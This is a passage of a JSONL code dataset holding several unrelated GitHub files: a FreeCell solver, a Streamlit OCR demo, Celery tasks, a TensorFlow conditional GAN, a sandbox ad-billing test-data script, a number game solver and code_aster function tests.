last_card.is_red == card.is_red or card.num - last_card.num != 1:\n break\n serie.append(card)\n last_card = card\n serie.reverse()\n return serie\n \n def _update_column_series(self, col_id):\n if col_id != COL_FC and col_id != COL_BASE:\n self._column_series[col_id] = self._get_column_series(col_id)\n \n def _compute_mvt_max(self):\n freecol = sum([len(col) == 0 for col in self.fcboard.columns])\n max_mvt = (1 + FREECELL - len(self.fcboard.freecells)) * (1 + freecol)\n max_mvt_empty = (1 + FREECELL - len(self.fcboard.freecells)) * freecol\n self._last_max_mvt = max_mvt\n return max_mvt, max_mvt_empty\n\n def list_choices(self):\n \"\"\" Compute choice from destination (except for bases) \"\"\"\n choices = []\n # compute size of mvt allowed:\n max_mvt, max_mvt_empty = self._compute_mvt_max()\n\n # Bases from freecell\n for c in self.fcboard.freecells:\n if c.num == len(self.fcboard.bases[c.suit]) + 1:\n choices.append(Choice([c], COL_FC, COL_BASE))\n \n # Columns\n for cid in range(COLUMN):\n col = self._column_series[cid]\n if len(col) > 0:\n last_card = col[-1]\n\n # to Base\n if last_card.num == len(self.fcboard.bases[last_card.suit]) + 1:\n choices.append(Choice([last_card], cid, COL_BASE))\n\n # Search specific cards\n if last_card.num > 1:\n wanted_is_red = not last_card.is_red\n wanted_num = last_card.num-1\n \n # from freecell\n for c in self.fcboard.freecells:\n if c.num == wanted_num and c.is_red == wanted_is_red:\n choices.append(Choice([c], COL_FC, cid))\n \n # from other col\n for cid2 in range(COLUMN):\n if cid == cid2:\n continue\n col2 = self._column_series[cid2]\n idx = 0\n for c in col2:\n if c.num == wanted_num and c.is_red == wanted_is_red:\n if (len(col2) - idx) <= max_mvt:\n choices.append(Choice(col2[idx:], cid2, cid))\n break\n idx += 1\n \n # to Freecell\n if len(self.fcboard.freecells) < FREECELL:\n choices.append(Choice([last_card], cid, COL_FC))\n else:\n # from Freecell\n for c in self.fcboard.freecells:\n choices.append(Choice([c], COL_FC, cid))\n\n # from other columns\n for cid2 in range(COLUMN):\n if cid == cid2:\n continue\n col2 = self._column_series[cid2]\n for j in range(max(0, len(col2)-max_mvt_empty), len(col2)):\n choices.append(Choice(col2[j:], cid2, cid))\n \n return choices\n\n def apply(self, choice):\n self.fcboard.apply(choice)\n self._update_column_series(choice.col_orig)\n self._update_column_series(choice.col_dest)\n","repo_name":"fp2103/fcsolver","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12470260962","text":"\n### Imports\nfrom enum import Enum\nfrom io import BytesIO, StringIO\nfrom typing import Union\nimport os, sys, json\nimport pandas as pd\nimport streamlit as st\nfrom PIL import Image\n\n# for heroku (also going to add to oer_demo.py)\n# pytesseract.pytesseract.tesseract_cmd = '/app/.apt/usr/bin/tesseract'\n\n# .py files\nsys.path.append(os.path.join('./data/images/'))\nsys.path.append(os.path.join('./src/'))\nimport parse\nimport binarize_images\nimport img_to_text\n\nSTYLE = \"\"\"\n\n\"\"\"\n\nFILE_TYPES = [\"png\", \"jpg\", \"tiff\"]\n\n\nclass FileType(Enum):\n \"\"\"Used to distinguish between file types\"\"\"\n\n IMAGE = \"Image\"\n CSV = \"csv\"\n PYTHON = \"Python\"\n\n\ndef get_file_type(file: Union[BytesIO, StringIO]) -> FileType:\n \"\"\"The file uploader widget does not provide information on the type of file uploaded so we have\n to guess using rules or ML\n\n I've implemented rules for now :-)\n\n Arguments:\n file {Union[BytesIO, StringIO]} -- The file uploaded\n\n Returns:\n FileType -- A best guess of the file type\n \"\"\"\n\n if isinstance(file, BytesIO):\n return FileType.IMAGE\n content = file.getvalue()\n if (\n content.startswith('\"\"\"')\n or \"import\" in content\n or \"from \" in content\n or \"def \" in content\n or \"class \" in content\n or \"print(\" in content\n ):\n return FileType.PYTHON\n\n return FileType.CSV\n\n\ndef main():\n st.write(os.getcwd())\n st.write('# OER image to text')\n # st.info(__doc__)\n st.markdown(STYLE, unsafe_allow_html=True)\n\n last_name_input = st.text_input(\"Enter your last name\")\n if not last_name_input:\n st.warning('Please type last name and hit enter')\n\n threshold_input = st.number_input(\"Enter threshold for binarizing images [0, 255]\", min_value=0, max_value=255, value=150)\n\n\n page1 = st.file_uploader(\"Upload OER page 1\", type=FILE_TYPES)\n page2 = st.file_uploader(\"Upload OER page 2\", type=FILE_TYPES)\n show_page1 = st.empty()\n show_page2 = st.empty()\n\n\n if not page1:\n show_page1.info(\"Please OER page 1 of type: \" + \", \".join(FILE_TYPES))\n return\n if not page2:\n show_page2.info(\"Please upload OER page 2 of type: \" + \", \".join(FILE_TYPES))\n return\n # get data from images\n\n\n\n # once both files uploaded\n if page1 and page2:\n show_page1.image(page1.read())\n show_page2.image(page2.read())\n # get names and extensions\n input1_filename = page1.name\n input1_ext = input1_filename[input1_filename.rindex('.')+1:]\n input2_filename = page2.name\n input2_ext = input2_filename[input2_filename.rindex('.')+1:]\n\n last_name = last_name_input.lower()\n\n # images new file names\n filename_page_1 = last_name + '_page1.' + input1_ext\n filename_page_2 = last_name + '_page2.' + input2_ext\n\n # binarized images new file names\n filename_bin_page_1 = last_name + '_bin_' + str(threshold_input) + '_page1.' + input1_ext\n filename_bin_page_2 = last_name + '_bin_' + str(threshold_input) + '_page2.' + input2_ext\n # filename_bin_page_1=$name$bin$thresh$page1$extension\n # filename_bin_page_2=$name$bin$thresh$page2$extension\n\n # txt filename\n txt_filename = last_name + '_bin_' + str(threshold_input) + '.txt'\n #txt_filename=$name$bin$thresh$txt\n\n # json file name\n json_filename = last_name + '_bin_' + str(threshold_input) + '.json'\n\n # open and save images to file structure\n page1_img = Image.open(page1)\n page2_img = Image.open(page2)\n\n SAVE_PATH = './data/images/'\n\n page1_img.save(SAVE_PATH + filename_page_1)\n page2_img.save(SAVE_PATH + filename_page_2)\n\n\n\n # page1.close()\n # page2.close()\n # if show:\n # page_1_image_show = Image.open(SAVE_PATH + filename_page_1)\n # page_2_image_show = Image.open(SAVE_PATH + filename_page_1)\n # show_page1.image(page_1_image_show)\n # show_page2.image(page_2_image_show)\n # # show_page1.image(page1.read())\n # # show_page2.image(page2.read())\n\n ### binarize\n with st.spinner('Preprocessing OER image'):\n sys.argv = [\"binarize_images.py\", str(threshold_input), filename_page_1, filename_page_2]\n # os.system('python binarize_images 150' + page1_name + ' ' + page2_name)\n binarize_images.main()\n\n\n ### img to text\n with st.spinner('Reading text from image...'):\n sys.argv = [\"img_to_text.py\", filename_bin_page_1, filename_bin_page_2]\n img_to_text.main()\n\n ### parse\n with st.spinner('Converting text to machine-readable format...'):\n sys.argv = [\"parse.py\", txt_filename, filename_bin_page_2]\n parse.main()\n st.success('Conversion complete!')\n\n\n st.write('## Output')\n\n with open('./data/output/' + json_filename, 'r') as f:\n output = json.load(f)\n st.write(output)\n\n\n\n\n\n\n\n\n\n\n\nmain()\n\n\n# if uploaded_file == None:\n# st.warning('Please upload pdf resume for the demo')\n# st.stop()\n# else:\n# if isinstance(file, BytesIO):\n# return FileType.IMAGE\n# = uploaded_pdf_to_text(uploaded_file)\n#\n# show_file.image(file)\n#\n#\n#\n#\n# file_option = st.selectbox('txt or pdf resume?', ['Select one', '.txt', '.pdf', 'upload my own pdf'])\n# #### text options\n# if file_option == 'Select one':\n# st.warning('Please select a .txt or .pdf example resume or upload your own pdf')\n# st.stop()\n#\n# elif file_option == '.txt':\n# option = st.selectbox('which .txt resume would you like to use?',\n# ('Select one', 'Accounting', 'Data_Scientist', 'Logistics', 'Manufacturing_Engineer', 'Marketing', 'Nurse', 'Security_Guard', 'Software_Developer', 'Waitress'))\n# if option == 'Select one':\n# st.warning('Please select an example pdf resume for the demo')\n# st.stop()\n# text_lookup_res = load_from_txt(option.lower())\n#\n# ### pdf options\n# elif file_option == '.pdf':\n# option = st.selectbox('which pdf resume would you like to use?',\n# ('Select one', 'Accountant', 'Auditor', 'Banking_Analyst', 'Business_Associate', 'Compliance', 'Investment_Banking', 'Investor_Relations', 'Office_Manager', 'Paralegal'))\n# if option == 'Select one':\n# st.warning('Please select an example pdf resume for the demo')\n# st.stop()\n# pdf_to_text(option.lower())\n# text_lookup_res = load_from_txt(option.lower(), pdf=True)\n#\n# elif file_option == 'upload my own pdf':\n# uploaded_file = st.file_uploader(\"Choose a file\", type='pdf')\n# if uploaded_file == None:\n# st.warning('Please upload pdf resume for the demo')\n# st.stop()\n# else:\n# text_lookup_res = uploaded_pdf_to_text(uploaded_file)\n# option = 'Uploaded'\n#\n# st.write('## {} Resume Text:'.format(option))\n# st.write(text_lookup_res)\n#\n#\n# ### Compute skill topics\n# with st.spinner('Computing skills and job matches...'):\n# df = load_df()\n# d2v_model = load_d2v_model()\n# lda_model = load_LDA_model()\n# topic_words_all = load_topic_words()\n# st.success('Computation complete.')\n#\n#\n# section_separator()\n# st.write('## {} Resume Skills:'.format(option))\n# skill_words = 15\n# topic_words = [topic_words_all[i][:skill_words] for i in range(len(topic_words_all))]\n# with st.spinner('Extracting skills from resume...'):\n# res_topics = get_doc_topics(text_lookup_res, lda_model)\n# # st.write('Res topics ' + str(res_topics))\n# # st.write('Ordered res topics ' + str(res_topics_ordered))\n#\n# skills_to_display = st.slider('How many skills do you want to see?', 0, 20, 5)\n# show_skills_and_words(skills_to_display, res_topics)\n#\n#\n#\n# # top_skills = 4\n# # if top_skills > len(res_topics_ordered):\n# # top_skills = len(res_topics_ordered)\n# # for i in range(top_skills):\n# # skill = res_topics_ordered[i][0]\n# # score = res_topics_ordered[i][1]\n# # st.write('Skill #' + str(i+1) + \": \" + str(skill) + ' score: ' + str(score))\n# # st.write('Skill words: ' + str(topic_words[skill]))\n#\n# section_separator()\n# \"\"\"\n# ## Jobs similar to this resume\n# \"\"\"\n# similar_jobs_to_resume = st.slider('# similar jobs to selected resume', 0, 15, 5)\n# predict_jobs(d2v_model, df, text=text_lookup_res, topn=similar_jobs_to_resume)\n#\n#\n# section_separator()\n# \"\"\"\n# ## Search for Jobs Similar to a Selected Job\n# Pick a job number, see that job, you will be shown similar jobs\n# \"\"\"\n# job_num = int(st.text_input(label=\"Enter a Job ID between 0 and 22000\", value=\"-1\"), 10)\n# if job_num == -1:\n# st.warning('No job ID selected for search')\n# st.stop()\n#\n# similar_jobs_to_job = st.slider('# similar jobs to selected job', 0, 10, 5)\n#\n# st.write('#### Showing similar jobs to this one')\n# print_job_info(job_num)\n#\n# # show similar jobs\n# text_lookup_job = df.iloc[job_num]['job_description']\n# predict_jobs(d2v_model, df, text=text_lookup_job, topn=similar_jobs_to_job)\n#\n#\n# section_separator()\n# \"\"\"\n# ## Here's the data behind this demo\n# \"\"\"\n# short = df[:10000]\n# st.write(short)\n","repo_name":"rskuzma/OER_demo","sub_path":"oer_demo.py","file_name":"oer_demo.py","file_ext":"py","file_size_in_byte":9297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4885396988","text":"from celery import shared_task\nfrom .models import Raca, Cachorro\n\n\n\n@shared_task()\ndef adicionar_raca(nome, cores, pais, tamanho, descricao):\n raca = Raca(nome=nome, cores=cores, pais=pais, tamanho=tamanho, descricao=descricao)\n raca.save()\n print('A raça foi adicionada com sucesso!')\n \n@shared_task()\ndef adicionar_cachorro(nome, peso, altura, sexo, descricao, personalidade, raca_id):\n raca = Raca.objects.get(id=raca_id)\n cachorro = Cachorro(nome=nome, peso=peso, altura=altura, sexo=sexo, descricao=descricao, personalidade=personalidade, raca=raca)\n cachorro.save()\n print('O cachorro foi adicionado com sucesso!')\n\n@shared_task()\ndef excluir_raca(raca_id):\n Raca.objects.get(id=raca_id).delete()\n print('A raça foi excluida com sucesso!')\n\n@shared_task()\ndef excluir_cachorro(cachorro_id):\n Cachorro.objects.get(id=cachorro_id).delete()\n print('O cachorro foi excluido com sucesso!')\n","repo_name":"AndreRamos-py/VINDOG","sub_path":"Vindog/racas/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"8928566605","text":"\"\"\" Conditional Generative Adversarial Network.\n\nThis is in fact the Least-Squares CGAN, as I found it\nyields best results so far. However, the GAN market\nis developing rapidly.\n\"\"\"\nimport sys\nimport time\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom sklearn.preprocessing import MinMaxScaler\nimport tensorflow as tf\n\nfrom neural_networks import nn\n\n\nclass SkeletonNN(nn.NN):\n __doc__ = \"\"\" A neural net skeleton.\n \n Used by the GAN class to create neural net graphs. \"\"\"\n __doc__ += nn.NN.__doc__\n\n def __init__(self, x_tf, dropout_tf, **kwargs):\n #super().__init__(x_tf=x_tf, dropout_tf=dropout_tf,**kwargs)\n nn.NN.__init__(self, x_tf=x_tf, dropout_tf=dropout_tf, **kwargs)\n\n def define_loss(self):\n return None\n\n def define_training(self):\n return None\n\n def define_scalers(self):\n return None, None\n\n def predict(self):\n pass\n\n def fit(self):\n pass\n\n\nclass CGAN(object):\n \"\"\" A Least-Squares CGAN.\n\n Args:\n x_dim (int): Data dimensionality.\n cond_dim (int): Conditioning data dimensionality.\n noise_dim (int): Generator random input dimensionality.\n g_arch ([int, int]): Generator architecture.\n g_ntype (str): Generator net type (see neural_networks.nn).\n d_arch ([int, int]): Discriminator architecture.\n d_ntype (str): Discriminator net type (see neural_networks.nn).\n \"\"\"\n def __init__(self, x_dim, cond_dim, noise_dim, g_arch=[128, 128],\n g_ntype='plain', d_arch=[128, 128], d_ntype='plain', **kwargs):\n # Bookkeeping.\n self.x_dim = x_dim\n self.cond_dim = cond_dim\n self.noise_dim = noise_dim\n self.x_tf = tf.placeholder(\n tf.float32, [None, x_dim], name='x_input')\n self.cond_tf = tf.placeholder(\n tf.float32, [None, cond_dim], name='cond_input')\n self.z_tf = tf.placeholder(\n tf.float32, [None, noise_dim], name='z_input')\n self.lr_tf = tf.placeholder(\n tf.float32, name='learning_rate')\n self.dropout_tf = tf.placeholder(\n tf.float32, name='dropout')\n self.g_arch = g_arch\n self.g_ntype = g_ntype\n self.d_arch = d_arch\n self.d_ntype = d_ntype\n \n # Define the Generator, Discriminator, and their losses.\n self.y_from_x, self.y_from_z, self.x_from_z =\\\n self.define_gan()\n with tf.variable_scope('g_loss'):\n self.g_loss_tf = self.define_gloss()\n self.g_train_tf = self.define_gtrain()\n with tf.variable_scope('d_loss'):\n self.d_loss_tf = self.define_dloss()\n self.d_train_tf = self.define_dtrain()\n\n # Define the data scalers.\n self.scaler_x, self.scaler_cond = self.define_scalers()\n\n def define_scalers(self):\n \"\"\" Use the MinMax scaler, as generator will have tanh outputs. \"\"\"\n return (MinMaxScaler(feature_range=(-1, 1)),\n MinMaxScaler(feature_range=(-1, 1)))\n\n def define_gan(self):\n with tf.variable_scope('generator'):\n gen_net = SkeletonNN(x_dim=self.cond_dim + self.noise_dim,\n y_dim=self.x_dim, arch=self.g_arch, ntype=self.g_ntype,\n x_tf=tf.concat([self.cond_tf, self.z_tf], axis=1),\n dropout_tf=self.dropout_tf)\n x_from_z = tf.nn.tanh(gen_net.y_pred)\n with tf.variable_scope('discriminator') as scope:\n disc_net = SkeletonNN(x_dim=self.cond_dim + self.x_dim,\n y_dim=1, arch=self.d_arch, ntype=self.d_ntype,\n x_tf=tf.concat([self.cond_tf, self.x_tf], axis=1),\n dropout_tf=self.dropout_tf)\n y_from_x = disc_net.y_pred\n scope.reuse_variables()\n y_from_z = SkeletonNN(x_dim=self.cond_dim + self.x_dim,\n y_dim=1, arch=self.d_arch, ntype=self.d_ntype,\n x_tf=tf.concat([self.cond_tf, x_from_z], axis=1),\n dropout_tf=self.dropout_tf).y_pred\n return y_from_x, y_from_z, x_from_z\n\n def define_gloss(self):\n return .5 * tf.reduce_mean(tf.pow(self.y_from_z - 1, 2))\n\n def define_gtrain(self):\n all_vars = tf.trainable_variables()\n var_list = [v for v in all_vars if v.name.startswith('generator/')]\n return tf.train.AdamOptimizer(self.lr_tf).minimize(\n self.g_loss_tf, var_list=var_list)\n\n def define_dloss(self, flip=False):\n return .5 * (tf.reduce_mean(tf.pow(self.y_from_x - 1, 2)\n + tf.pow(self.y_from_z, 2)))\n\n def define_dtrain(self):\n all_vars = tf.trainable_variables()\n var_list = [v for v in all_vars if v.name.startswith('discriminator/')]\n return tf.train.AdamOptimizer(self.lr_tf).minimize(\n self.d_loss_tf, var_list=var_list)\n\n def fit(self, x, cond, sess, epochs=1000, batch_size=32, lr=1e-3,\n n_diters=100, nn_verbose=True, **kwargs):\n start_time = time.time()\n batch_size = min(batch_size, x.shape[0])\n x = self.scaler_x.fit_transform(x)\n cond = self.scaler_cond.fit_transform(cond)\n\n for epoch in range(epochs):\n # Train the discriminator.\n for k in range(n_diters):\n x_ids = np.random.choice(x.shape[0], batch_size)\n feed_dict = {self.x_tf: x[x_ids],\n self.cond_tf: cond[x_ids],\n self.z_tf: self.sample_noise(batch_size),\n self.dropout_tf: 1.,\n self.lr_tf: lr}\n _, dloss = sess.run([self.d_train_tf, self.d_loss_tf],\n feed_dict)\n\n # Train the generator.\n z_noise = self.sample_noise(batch_size)\n x_ids = np.random.choice(x.shape[0], batch_size)\n feed_dict = {self.z_tf: self.sample_noise(batch_size),\n self.cond_tf: cond[x_ids],\n self.lr_tf: lr,\n self.dropout_tf: 1.}\n _, gloss = sess.run([self.g_train_tf, self.g_loss_tf], feed_dict)\n\n # Bookkeeping.\n tr_time = time.time() - start_time\n if nn_verbose:\n sys.stdout.write(('\\rTraining epoch {}, time {}s. '\n 'Discriminator loss {:.4g}. '\n 'Generator loss {:.4g}.').format(\n epoch, int(tr_time), dloss, gloss))\n sys.stdout.flush()\n\n def sample(self, n_samples, cond, sess):\n \"\"\" Sample from the distribution defined by the generator.\n\n Args:\n n_samples (int): Number of samples to create *per each cond data*.\n cond (n_data, cond_dim): Conditioning data.\n sess: Tensorflow session.\n\n Returns:\n samples (n_data, n_samples, x_dim): Samples defined by the\n generator's distribution.\n \"\"\"\n cond = self.scaler_cond.transform(cond)\n res = np.zeros((cond.shape[0], n_samples, self.x_dim))\n for cond_id, cond_data in enumerate(cond):\n z_noise = self.sample_noise(n_samples)\n feed_dict = {self.z_tf: z_noise,\n self.cond_tf: np.array([cond_data] * n_samples),\n self.dropout_tf: 1.}\n x = sess.run(self.x_from_z, feed_dict)\n res[cond_id] = self.scaler_x.inverse_transform(x)\n return res\n\n def sample_noise(self, n_samples):\n \"\"\" Sample inputs to the generator.\n\n Args:\n n_samples (int): Number of noise-samples.\n\n Returns:\n noise (n_samples, self.noise_dim): Noise samples.\n \"\"\"\n return np.random.randn(n_samples, self.noise_dim)\n\n\nif __name__==\"__main__\":\n from tensorflow.examples.tutorials.mnist import input_data\n import matplotlib.pyplot as plt\n n_samples = 10000\n kwargs = {\n 'epochs': 10000,\n 'g_arch': [32]*10,\n 'g_ntype': 'plain',\n 'd_arch': [32]*10,\n 'd_ntype': 'plain',\n 'n_diters': 10,\n 'lr': 1e-4,\n 'noise_dim': 10,\n 'batch_size': 32,\n }\n # Make test data: a noisy mix of functions sampled with different probs.\n cond = np.linspace(-1, 1, n_samples ).reshape(-1, 1)\n x1 = cond**2 + np.random.randn(*cond.shape) * .3\n x2 = -cond/2-1 + np.random.randn(*cond.shape) * .1\n x3 = -cond-2 + np.random.randn(*cond.shape) * .1\n x4 = cond-3 + np.random.randn(*cond.shape) * .1\n x = np.hstack([x1, x2, x3, x4])\n ids = np.random.choice(4, x.shape[0], p=[.7, .1, .1, .1])\n x = cond + x[np.arange(x.shape[0]), ids].reshape(-1, 1)\n\n cgan = CGAN(x_dim=x.shape[1], cond_dim=cond.shape[1], **kwargs)\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n # Use a writer object for Tensorboard.\n summary = tf.summary.merge_all()\n writer = tf.summary.FileWriter('logs/{}'.format('gan'))\n writer.add_graph(sess.graph)\n\n # Fit the net.\n cgan.fit(x=x, cond=cond, sess=sess, nn_verbose=True, **kwargs)\n\n # Generate some samples.\n samples = cgan.sample(n_samples=1, cond=cond, sess=sess)\n\n plt.figure(figsize=(20, 10))\n plt.subplot(1, 2, 1)\n plt.title('Samples real data.')\n plt.xlabel('x')\n plt.ylabel('y')\n plt.ylim([x.min(), x.max()])\n plt.plot(cond, x, 'k.', alpha=.2)\n\n plt.subplot(1, 2, 2)\n plt.title('CGAN samples.')\n plt.xlabel('x')\n plt.ylabel('y')\n plt.ylim([x.min(), x.max()])\n plt.plot(cond, np.squeeze(samples), 'k.')\n\n plt.show()\n","repo_name":"kjchalup/neural_networks","sub_path":"neural_networks/cgan.py","file_name":"cgan.py","file_ext":"py","file_size_in_byte":9712,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"24259048676","text":"import requests\nimport pandas as pd\nimport sys\nimport os\nimport random\nimport time\nfrom datetime import datetime\n\n# 젠킨스 사용 시 활성화 시킬 것\n# sys.path.append(os.environ['WORKSPACE']) # jenkins\n\nfrom model.data.GoogleDriveAPIAuth import GoogleAPIAuth\nfrom model.data.VariableSet import VariableSet\n\n\n# 스프레드시트 데이터 가져오기\nvs = VariableSet()\ngd = GoogleAPIAuth()\ndoc = gd.gc.open_by_url(vs.spreadsheet_url)\nws = doc.worksheet('소재정보')\n# doc = gd.gc.open_by_url(vs.spreadsheet_test)\n# ws = doc.worksheet('시트1')\nvalues = ws.get_all_values()\n\n# 시작할 행 숫자 입력\nstartrow = 2\n\n# 헤더와 데이터 테이블 범위 지정\nheader, rows = values[0], values[startrow - 1:]\nexcel_source = pd.DataFrame(rows)\nprint(\"소재 개수: \" + str(len(excel_source)) + \"개\")\n# print(excel_source)\n\n# 초기 변수 선언\nresults = []\ni = startrow\nj = 0\nnumber = len(excel_source)\ndt = datetime.fromtimestamp(time.time())\ndate = '빌드날짜 : ' + str(dt)[:16]\n\ndef get_excel_source(row):\n # 노출/클릭수량 관련 랜덤값 설정\n rainta = 100 # raintb보다 항상 작게\n raintb = 10000\n diva = 10 # divb보다 항상 작게\n divb = 100\n\n # # API 고정 변수 지정\n # 건당 과금금액\n chargeAmount_CPM = random.randint(1,3)\n chargeAmount = random.randint(50,300)\n # 서버 환경. 샌박 Only 지원으로 건들지 말 것\n profileServer = 'SANDBOX'\n # 과금 방식. CPMS/CPT, 스폰서드 미지원\n spendingMethod_CPM = 'CPM'\n spendingMethod = 'CPC'\n # 테스트 회차\n testDegree = 1\n\n # 광고계정 ~ 소재ID 추출\n walletId = excel_source[0][row]\n campaignId = excel_source[1][row]\n adGroupId = excel_source[2][row]\n representativeId = excel_source[3][row]\n spendingMethod_org = excel_source[4][row]\n\n if spendingMethod_org == 'CPM':\n chargeAmount = 0\n elif spendingMethod_org == 'CPA':\n spendingMethod = spendingMethod_org\n chargeAmount_CPM = 0\n chargeAmount = 1500\n elif spendingMethod_org == 'CPC':\n chargeAmount_CPM = 0\n elif spendingMethod_org == 'CPV':\n spendingMethod = spendingMethod_org\n chargeAmount_CPM = 0\n chargeAmount = 20\n elif spendingMethod_org == '자동':\n randomAmount = random.choice([0, int(chargeAmount)])\n if randomAmount == 0:\n chargeAmount = randomAmount\n else:\n chargeAmount = 0\n else:\n chargeAmount_CPM = 0\n chargeAmount = 0\n\n # 발송 건수\n msgCount_CPM = random.randint(rainta, raintb)\n a = random.randint(diva, divb)\n msgCount = int(msgCount_CPM / a)\n\n # 건별 과금 발송 (API Request)\n server = '{서버주소}'\n path = '{URI}'\n params_CPM = {'walletId': walletId, 'adGroupId': adGroupId, 'campaignId': campaignId,\n 'representativeId': representativeId, 'chargeAmount': chargeAmount_CPM, 'msgCount': msgCount_CPM,\n 'profile': profileServer, 'spendingMethod': spendingMethod_CPM, 'testDegree': testDegree}\n time.sleep(1)\n params = {'walletId': walletId, 'adGroupId': adGroupId, 'campaignId': campaignId,\n 'representativeId': representativeId, 'chargeAmount': chargeAmount, 'msgCount': msgCount,\n 'profile': profileServer, 'spendingMethod': spendingMethod, 'testDegree': testDegree}\n url = server + path\n\n # 응답결과 추출\n response_CPM = requests.post(url, params=params_CPM)\n response = requests.post(url, params=params)\n results.append(\n (representativeId, spendingMethod_CPM, chargeAmount_CPM, msgCount_CPM, response_CPM.status_code, spendingMethod,\n chargeAmount, msgCount, response.status_code))\n\n return results\n\n# 데이터가 100개가 넘을 경우 100개 단위로 결과값 입력\nwhile number >= 100:\n for data in range(100):\n api_response = get_excel_source(j)\n i += 1\n j += 1\n number -= 1\n time.sleep(1)\n\n # 스프레드시트에 결과값 일괄 입력\n print(\"[[\" + str(j) + \"번째 과금 완료]]\")\n ws.update('G' + str(startrow), results)\n\nmidrow = j\n\n# 리스트 초기화\nresults = []\n\nprint(\"[[마지막 소재 개수: \" + str(len(excel_source) - j) + \"]]\")\nfor data in range(len(excel_source) - j):\n api_response = get_excel_source(j)\n i += 1\n j += 1\n time.sleep(1)\n\n# 스프레드시트에 결과값 일괄 입력\nws.update('G' + str(startrow + midrow), results)\n\n# 스프레드시트에 빌드날짜 입력\nws.update('P1', date)\n\nprint(\"[[\" + str(j) + \"번째 과금 완료]]\")","repo_name":"alvinshin81/alvinshin","sub_path":"usefulScripts/createMetricData_usingAPI.py","file_name":"createMetricData_usingAPI.py","file_ext":"py","file_size_in_byte":4595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42457477025","text":"class GameSolution:\n def __init__(self, max_value):\n self.__max_value = max_value\n self.__hugo_string = \"hugo\"\n\n def get_all_solutions(self, numbers):\n \"\"\"\n get_all_solutions(numbers) -> Dictionary\n Calculates the solution for the numbers for the game HUGO. The result is returned as a dictionary. The\n key is the counter of the game and the value is the solution.\n\n @param numbers A list of numbers, for which the solution should be calculated.\n \"\"\"\n numbers_to_play_with = []\n solution = {}\n\n for number in numbers:\n numbers_to_play_with.extend(self.__get_solution_for_number(number))\n\n numbers_to_play_with.sort()\n numbers_to_play_with = list(set(numbers_to_play_with))\n\n for val in range(1, self.__max_value + 1):\n if numbers_to_play_with.__contains__(val):\n solution[val] = self.__hugo_string\n else:\n solution[val] = str(val)\n\n return solution\n\n def __get_solution_for_number(self, number):\n hugo_numbers = []\n\n try:\n int(number)\n\n # string of value\n string_row = str(number)\n for val in range(1, self.__max_value + 1):\n hugo_numbers.append(val * number)\n\n # row with number in it\n if string_row not in str(val):\n continue\n else:\n hugo_numbers.append(val)\n\n except ValueError:\n print(\"No number recognized\")\n\n return hugo_numbers\n","repo_name":"iarava/HSLU-ROBLAB-Hugo","sub_path":"logic/gameSolution.py","file_name":"gameSolution.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20346938551","text":"from math import sin, pi\nimport numpy as np\n\nimport code_aster\nfrom code_aster.Commands import *\n\ncode_aster.init(\"--test\", ERREUR=_F(ALARME=\"EXCEPTION\"))\n\ntest = code_aster.TestCase()\n\nfsin = code_aster.Function()\nfsin.setParameterName(\"INST\")\nfsin.setResultName(\"TEMP\")\nfsin.setInterpolation(\"LIN LIN\")\ntest.assertEqual(fsin.getType(), \"FONCTION_SDASTER\", msg=\"fsin: check type\")\n\nwith test.assertRaises(RuntimeError, msg=\"fsin: interp type\"):\n fsin.setInterpolation(\"invalid\")\n\nfsin.setExtrapolation(\"CC\")\n\n# check properties assignment\nprop = fsin.getProperties()\ntest.assertEqual(prop[1:5], [\"LIN LIN\", \"INST\", \"TEMP\", \"CC\"], msg=\"fsin: properties\")\n\n# values assignment\nn = 12\nvalx = np.arange(n) * 2.0 * pi / n\nvaly = np.zeros(n)\n\n# sizes checking\nfsin.setValues(valx, valy)\nwith test.assertRaisesRegex(RuntimeError, \"length.*be equal\"):\n fsin.setValues(valx, [0.0, 1.0])\nwith test.assertRaisesRegex(RuntimeError, \"function size is\"):\n fsin.setValues([0.0, 1.0], [0.0, 1.0])\n\n# assign correct values\nvaly = np.sin(valx) * -1.0\nfsin.setValues(valx, valy)\n\n# fsin.debugPrint(6)\n\ntest.assertAlmostEqual(fsin(pi / 2.0), -1.0, msg=\"fsin(pi/2)\")\n\n# check Function.abs()\nfabs = fsin.abs()\narrabs = fabs.getValuesAsArray()\ntest.assertTrue(np.alltrue(arrabs[:, 1] >= 0.0), msg=\"fsin: abs values\")\ntest.assertAlmostEqual(fabs(pi / 2.0), 1.0, msg=\"fabs(pi/2)\")\n\nvalues = fsin.getValuesAsArray()\ntest.assertEqual(values.shape, (n, 2), msg=\"fsin: shape\")\n\n# complex\nfcmpl = code_aster.FunctionComplex()\nfcmpl.setParameterName(\"INST\")\nfcmpl.setResultName(\"TEMP\")\nfcmpl.setInterpolation(\"LIN LIN\")\ntest.assertEqual(fcmpl.getType(), \"FONCTION_C\", msg=\"fcmpl: type\")\n\nvalz = np.zeros(2 * n)\nfcmpl.setValues(valx, valz)\n\nwith test.assertRaisesRegex(RuntimeError, \"length.*ordinates.*twice.*absc\"):\n fcmpl.setValues(valx, [0.0, 1.0])\nwith test.assertRaisesRegex(RuntimeError, \"function size is\"):\n fcmpl.setValues([0.0, 1.0], [0.0, 1.0, 0.1, 1.2])\n\nvalz = np.vstack([valy, valy]).transpose().ravel()\nfcmpl.setValues(valx, valz)\n\ntest.assertAlmostEqual(fcmpl(pi / 2.0), -1.0 - 1.0j, msg=\"fcmpl(pi/2)\")\n\nDF1 = DEFI_FONCTION(\n NOM_PARA=\"INST\",\n NOM_RESU=\"DEPL\",\n VERIF=\"CROISSANT\",\n PROL_DROITE=\"LINEAIRE\",\n ABSCISSE=(0.0, 1.0, 2.0),\n ORDONNEE=(0.0, 1.0, 3.0),\n)\n\nDF2 = 